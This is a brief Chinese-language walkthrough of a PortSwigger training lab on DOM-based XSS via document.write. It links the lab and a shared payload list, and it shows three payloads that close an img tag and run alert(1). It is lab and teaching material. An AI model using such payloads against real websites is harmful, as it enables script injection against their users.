burpsuite靶场----XSS----DOM型XSS1----document.write

burpsuite靶场----XSS----DOM型XSS1----document.write

靶场地址

https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink

XSS字典

链接：https://pan.baidu.com/s/1XAJbEc4o824zAAmvV85TOA
提取码：1234

正式开始

1.先输入一串字符锁定位置


2.发现要闭合img标签
"><script>alert(1)</script>
"><img src=x onerror=alert(1)>
" onerror=alert(1)>\\